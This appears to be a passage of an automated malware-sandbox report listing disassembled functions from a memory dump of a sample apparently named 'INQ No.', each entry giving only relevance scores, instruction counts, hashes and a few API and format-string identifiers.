                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F7678E Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                                            • Instruction ID: 2b2dd5b0f3186012ea673181ad1db947024a20ca4574bbd5dd2f00599095b0b1
                                                                                                                                                                            • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                                            • Instruction Fuzzy Hash: EBE02673A00524FBDB21A7998D02F9BBABDDB80FE4F054055B604E70E0D930EE04E6D0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F8A456 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                                                            • Instruction ID: b4db8b2ae70f5975755d3b96d555f92b6ce0ba4734c6b267efb551f2965b7ceb
                                                                                                                                                                            • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                                                            • Instruction Fuzzy Hash: C8E0ED31410A50DBEB36AB26DD49BA2B6E1EF40721F148869A096125B1C7B5ACD1EB41
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00ED25E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: fdb1e900b140f4136eb14f15006dcb66cba31eddd898c27a411b610910525b92
                                                                                                                                                                            • Instruction ID: 8c445acbed8a38c891165671116147caa6d75e4e72180b2793e674c2ba734142
                                                                                                                                                                            • Opcode Fuzzy Hash: fdb1e900b140f4136eb14f15006dcb66cba31eddd898c27a411b610910525b92
                                                                                                                                                                            • Instruction Fuzzy Hash: A9E092721006949BC311FB2ADD02F9B77EAEFA0360F114519B115672A1CA34E951D794
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F54000 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                            • Instruction ID: f7d1872889aa10aca33396c880bb3e80de7d33df8eecac8e7188462445a792da
                                                                                                                                                                            • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                            • Instruction Fuzzy Hash: ABE0C2347003058FD715CF19C044B6277B6BFD5B25F28C068AA488F249EB32E882DB40
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F0CA38 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 640592367ffa1f68e9949a38765d0e692cabfc7a0bc9e63bc6a0a04de8448425
                                                                                                                                                                            • Instruction ID: 741435490aaf6b3ed007a8794155fa4538fb673e621ff28e8f6ca26992203f05
                                                                                                                                                                            • Opcode Fuzzy Hash: 640592367ffa1f68e9949a38765d0e692cabfc7a0bc9e63bc6a0a04de8448425
                                                                                                                                                                            • Instruction Fuzzy Hash: 39D02B336850687ACF24E3157C19FE33A999B41720F014860F108E20B1D55CCC81B2D4
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EC823B Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                            • Instruction ID: 87a45f69d14978186930c9cbbe0f5d0991b876699e4df6bc3d81f4e4f84fac86
                                                                                                                                                                            • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                            • Instruction Fuzzy Hash: E5E08631404510DED7356E11DF05F9177A1FB94B10F20682DF441260758B759CD2EA54
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00ED2050 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8d4dfa19e2695b022dc2373ac4d89c935183de29cd025f99048efae56030edac
                                                                                                                                                                            • Instruction ID: 82e77d0ae1a2a65c3557ec095a7edddad8cf76da9f3560b859f05023796b02cc
                                                                                                                                                                            • Opcode Fuzzy Hash: 8d4dfa19e2695b022dc2373ac4d89c935183de29cd025f99048efae56030edac
                                                                                                                                                                            • Instruction Fuzzy Hash: 97E08C321005946BC211FB6EDE12E5A73DAEFA4360F100126B151AB2A1CA20ED01C7A4
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F08A90 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                                                            • Instruction ID: bab32beab73ae0b396b61559ac382fca0f0435c0ac954071a2a5d4ea6ef41f54
                                                                                                                                                                            • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                                                            • Instruction Fuzzy Hash: 0AE02633210A04D7C728DE18C411B7273A4EF44730F08423EA553477C0C934E804E794
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F26AA4 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                            • Instruction ID: ed7858c4f85353f513b716b45796d68a1feffca3fc81cc65adbce402da07c876
                                                                                                                                                                            • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                            • Instruction Fuzzy Hash: C7D05E36511A50AFC3329F1BEA04D13FBF9FBC4B20705066EA44693920C670EC06DBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F0E59C Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                            • Instruction ID: 9f0a5758f6c27e2f71dba7b6970c0cd3691fbb37b24149c3723fc9e1614cdf40
                                                                                                                                                                            • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                            • Instruction Fuzzy Hash: FCD0A932608A60ABD732AA2CFC04FC373E8AB88720F160499B009D7050C3A0EC81CA84
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F4E908 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                            • Instruction ID: 0585d7d30bdfae6ca3a7859a49707b5a7f4aab0f68db0f097045d4d91069591f
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                            • Instruction Fuzzy Hash: 5EE0EC359506849BCF16EF59C644F5ABBF5FB84B50F191458A4086B661C624ED01DB40
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00ECA0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                            • Instruction ID: b83c5004014320f1f369dc503bea10085c1da4695270a6cea8e4ce97faac03bb
                                                                                                                                                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                            • Instruction Fuzzy Hash: B0D0123221707497CB2956656E14FA7B9559B81BA8F2E107D740BB3900C5168C43D6E1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F0A830 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                            • Instruction ID: 097d3cf96d2fc5ee32ad5a1896ff75392af0202f64f4a814a18bc8a8bcdeddde
                                                                                                                                                                            • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                            • Instruction Fuzzy Hash: E7D022370D014CBBCB119F62CC02F907BA8E750BA0F004020B504870A0C63AE950C580
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F0CA24 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d248cb9a15156ff8aad6625e8dc5a86fddb768aab6d93a45acc6bf0bab127411
                                                                                                                                                                            • Instruction ID: 7c3aab982f57f0946f25ffab9ac21f1858f459262a0320d93e12eff1d19cd670
                                                                                                                                                                            • Opcode Fuzzy Hash: d248cb9a15156ff8aad6625e8dc5a86fddb768aab6d93a45acc6bf0bab127411
                                                                                                                                                                            • Instruction Fuzzy Hash: 53D0A930E0500ACBCF1ACF14CB29E3E7AB0EF10780B4000A8FE01A2070E328DC02FAA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EE02A0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                            • Instruction ID: dca603a1cb481fa75bd42954f8d35e99f851c9ee8a7fd656783d9137928e8965
                                                                                                                                                                            • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                            • Instruction Fuzzy Hash: 89D0C935212EC0CFC61BCB0DC5A8B1533F8BB48B88F855490E541CBB22E66CED80CE00
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F0C700 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                            • Instruction ID: b43a8386d88942015529d4d78911fc5d53539deced27e2415980463daa2fc03f
                                                                                                                                                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                            • Instruction Fuzzy Hash: 15C08033150648AFC711DF95CD01F0177E9E798B40F100061F30557571C531FD10D654
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EF0310 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                            • Instruction ID: dac05f6f9f3f21fe40354edd046da3f40e466aaaa7a5bb88ed157b096a28101d
                                                                                                                                                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                            • Instruction Fuzzy Hash: 7BD0123620024CEFCB01DF41C890DAA776AFBC8B10F109019FD19076118A31ED62DA50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00ED0750 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                            • Instruction ID: 8ef44cdf764b147de2d5d2429da1f4076bb84ffac8ae8e006d57bab66244281d
                                                                                                                                                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                            • Instruction Fuzzy Hash: 77C08838B00A888FCF20CB2AE288F0833E0FB00300F2208C0E800CBB22E220EC00CA00
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F12890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                                                            • Opcode ID: 4361ee0acb246a2b085b89e9e1e2d5014e71e85b59f0d29a9b3465ddfd2e1d3a
                                                                                                                                                                            • Instruction ID: 8d9b616ed361e381f24be6a3e8e5acd41c14fab405265fd81df40b50234bdf70
                                                                                                                                                                            • Opcode Fuzzy Hash: 4361ee0acb246a2b085b89e9e1e2d5014e71e85b59f0d29a9b3465ddfd2e1d3a
                                                                                                                                                                            • Instruction Fuzzy Hash: 0351F9B6E00216BFDB50DFAC8990ABEFBB8BB08310B54812AE455D7641D734DE50B7E0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F82410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                                                            • Opcode ID: 37986fa57035a693e4b335039f3f8a0e303f06d56190f85e0e381bffd82a91e1
                                                                                                                                                                            • Instruction ID: 096bd6cac82f8eeb06c29944d2b727885fd4f83e4fc70d1599280f7bd33f8f0c
                                                                                                                                                                            • Opcode Fuzzy Hash: 37986fa57035a693e4b335039f3f8a0e303f06d56190f85e0e381bffd82a91e1
                                                                                                                                                                            • Instruction Fuzzy Hash: 8D5127B5A00645AECB70EF5CCC809BFB7F8EF44310B148419E496D7682EA74FE00A760
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                                                                            • Opcode ID: 8840b2af8378807f60b5b48f8531ba4703552f5566b53e291d9fbcfbdd90766e
                                                                                                                                                                            • Instruction ID: b1b99d28cacfb6d99d333c022fa8482efae3e2f7721868d93e82f46283a92ab8
                                                                                                                                                                            • Opcode Fuzzy Hash: 8840b2af8378807f60b5b48f8531ba4703552f5566b53e291d9fbcfbdd90766e
                                                                                                                                                                            • Instruction Fuzzy Hash: 2921A376E00119ABCB50EF78CC45AEE7BE8EF44754F540116E905E3201EB34AA11ABA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F82300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                                                                            • Opcode ID: 30ca785c82e2becb4c9aca057c3856b79d07b87b27bc8db747dc4f248d5647f1
                                                                                                                                                                            • Instruction ID: 970f5f928f2905bb0d7d85f309ee33673c6a140920ede304bd4757acbb27f3a4
                                                                                                                                                                            • Opcode Fuzzy Hash: 30ca785c82e2becb4c9aca057c3856b79d07b87b27bc8db747dc4f248d5647f1
                                                                                                                                                                            • Instruction Fuzzy Hash: CF319876A002199FCB60DF28DD51BEEB7F8EF44710F844555E849E3241EB34AE45AFA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%